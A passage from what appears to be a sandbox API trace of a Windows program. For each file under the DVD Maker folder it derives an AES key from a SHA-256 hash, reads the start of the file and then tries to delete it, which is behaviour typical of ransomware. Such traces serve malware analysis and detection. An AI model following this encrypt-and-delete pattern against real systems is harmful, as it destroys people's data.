(hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.553] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0140.553] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7835 [0140.553] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0140.606] CryptDestroyHash (hHash=0x284d528) returned 1 [0140.606] CryptDestroyKey (hKey=0x284d668) returned 1 [0140.606] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.607] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png")) returned 0 [0140.609] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.625] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.626] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.626] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.626] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0140.626] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x278b [0140.626] ReadFile (in: hFile=0x3dc, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.635] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.635] CryptDestroyKey (hKey=0x284d528) returned 1 [0140.635] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.637] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png")) returned 0 [0140.638] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.638] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.638] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.638] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0140.638] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcd6 [0140.638] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.646] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.646] CryptDestroyKey (hKey=0x284d528) returned 1 [0140.646] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.647] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png")) returned 0 [0140.648] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.649] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.649] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.649] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0140.649] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcf4 [0140.649] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.652] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.652] CryptDestroyKey (hKey=0x284d528) returned 1 [0140.652] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.653] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png")) returned 0 [0140.653] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.654] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.654] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.654] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0140.654] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e55 [0140.654] ReadFile (in: hFile=0x428, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.658] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.658] CryptDestroyKey (hKey=0x284d528) returned 1 [0140.658] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.663] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png")) returned 0 [0140.663] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.664] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.664] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.664] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0140.664] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce8 [0140.664] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.666] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.666] CryptDestroyKey (hKey=0x284d528) returned 1 [0140.666] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.667] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png")) returned 0 [0140.705] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.705] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.705] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.705] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0140.705] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd8b [0140.706] ReadFile (in: hFile=0x428, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.708] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.708] CryptDestroyKey (hKey=0x284d528) returned 1 [0140.708] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.709] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png")) returned 0 [0140.719] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.724] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.725] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.725] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.725] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.725] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x303d [0140.725] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.747] CryptDestroyHash (hHash=0x284d528) returned 1 [0140.747] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.747] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.748] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png")) returned 0 [0140.757] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.758] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.758] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.758] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.758] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5354a [0140.758] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.786] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0140.786] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.787] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.788] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv")) returned 0 [0140.789] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.789] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.789] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.789] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.789] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4f6ca [0140.789] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.840] CryptDestroyHash (hHash=0x284d528) returned 1 [0140.840] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.840] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.841] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv")) returned 0 [0140.842] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.842] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.842] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.842] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.843] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2279e [0140.843] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.852] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0140.852] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.852] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.853] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv")) returned 0 [0140.854] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.854] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.854] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.854] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.854] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2661e [0140.854] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.868] CryptDestroyHash (hHash=0x284d528) returned 1 [0140.868] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.868] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.869] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv")) returned 0 [0140.918] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.919] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.919] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.919] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.919] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c9de [0140.919] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.927] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0140.927] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.927] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.929] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv")) returned 0 [0140.929] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.930] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.930] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.930] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.930] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2279e [0140.930] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.940] CryptDestroyHash (hHash=0x284d528) returned 1 [0140.940] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.940] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.942] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv")) returned 0 [0140.942] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0140.943] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0140.943] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.943] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0140.943] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2666c [0140.943] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0140.955] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0140.955] CryptDestroyKey (hKey=0x284d568) returned 1 [0140.955] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.956] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv")) returned 0 [0141.004] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.005] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.005] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.005] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.005] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2666c [0141.005] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.015] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.015] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.015] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.016] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv")) returned 0 [0141.017] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.018] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.018] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.018] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.018] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2472c [0141.018] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.027] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.027] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.027] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.028] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv")) returned 0 [0141.029] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.030] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.030] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.030] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.030] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e96c [0141.030] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.039] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.039] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.039] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.040] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv")) returned 0 [0141.041] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.041] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.041] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.041] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.041] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb6a [0141.041] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.129] CryptDestroyHash 